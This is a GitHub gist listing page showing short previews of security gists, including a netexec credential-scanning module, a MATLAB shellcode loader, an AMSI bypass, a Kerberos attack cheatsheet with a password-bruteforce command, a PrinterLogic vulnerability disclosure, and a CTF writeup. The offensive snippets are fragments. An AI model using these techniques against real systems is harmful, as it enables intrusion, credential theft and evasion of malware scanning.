Skip to content

Instantly share code, notes, and snippets.

View tanaka-geek's full-sized avatar

tanaka tanaka-geek

  • Tokyo
View GitHub Profile
@nullenc0de
nullenc0de / task_explorer
Created November 8, 2024 17:18
netexec smb TARGET -u ADMIN -p PASS -M task_explorer -o EXPORT_XML=True OUTPUT_DIR=./tasks SCAN_CREDS=True
from datetime import datetime
import xml.etree.ElementTree as ET
from typing import List, Dict, Optional
import os
import re
from impacket.dcerpc.v5.dcom.wmi import WBEMSTATUS
from nxc.helpers.logger import highlight
class TaskVulnerability:
def __init__(self, name: str, path: str, command: str, author: str,
@Wra7h
Wra7h / CreateThread.m
Last active September 19, 2023 05:19
Matlab Shellcode Loader
% Wra7h/FlavorTown
% MATLAB version: R2023a
% Tested on Win10 x64
if not(libisloaded('kernel32'))
loadlibrary('kernel32.dll', @kernel32proto);
end
if not(libisloaded('msvcrt'))
loadlibrary('msvcrt.dll', @msvcrtproto);
@wireghoul
wireghoul / Printerlogic-disclosure.md
Last active May 27, 2023 23:24
Printerlogic-disclosure

PrinterLogic SaaS, multiple vulnerabilities

PrinterLogic's Enterprise Print Management software allows IT professionals to simplify printer driver management and empower end users. -- https://www.printerlogic.com/

Background

The following findings were identified by performing both dynamic testing of the PrinterLogic SaaS platform and code analysis of the source code contained in the virtual appliance available for download from the PrinterLogic website (Build 1.0.757: July 29th, 2022).

@api0cradle
api0cradle / check_vulnerabledrivers.ps1
Created May 19, 2023 14:13
A quick script to check for vulnerable drivers. Compares drivers on system with list from loldrivers.io
# Simple script to check drivers in C:\windows\system32\drivers against the loldrivers list
# Author: Oddvar Moe - @oddvar.moe
$drivers = get-childitem -Path c:\windows\system32\drivers
$web_client = new-object system.net.webclient
$loldrivers = $web_client.DownloadString(" https://www.loldrivers.io/api/drivers.json") | ConvertFrom-Json
Write-output("Checking {0} drivers in C:\windows\system32\drivers against loldrivers.io json file" -f $drivers.Count)
foreach ($lol in $loldrivers.KnownVulnerableSamples)
{
@GeisericII
GeisericII / Get-LoggedOn.py
Last active November 1, 2024 19:35
Stupid simple script copied and pasted from reg.py/lookupsid and inspired from itm4n's session enum via registry
#!/usr/bin/python3
from __future__ import division
from __future__ import print_function
import re
import codecs
import logging
import time
import argparse
import sys
from impacket import version
@terjanq
terjanq / README.md
Last active June 14, 2024 14:36
TokyoWesterns CTF 2020 | writeups by @terjanq

TokyoWesterns CTF 2020 | writeups by @terjanq

Urlcheck v1 (98 points, 160 solves)

The goal was to bypass WAF protection to access local resources.

app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

def valid_ip(ip):
 matches = app.re_ip.match(ip)
@FatRodzianko
FatRodzianko / my-am-bypass.ps1
Last active August 15, 2024 11:52
small modification to Rastemouse's AmsiScanBuffer bypass to use bytes. Uses different opcode bytes
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
@bradtraversy
bradtraversy / mongodb_cheat_sheet.md
Last active November 17, 2024 10:01
MongoDB Cheat Sheet

MongoDB Cheat Sheet

Show All Databases

show dbs

Show Current Database

@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@thesubtlety
thesubtlety / sans-sec660-recommended-reading.md
Created January 5, 2019 00:08
SANS SEC660 GXPN Recommended Reading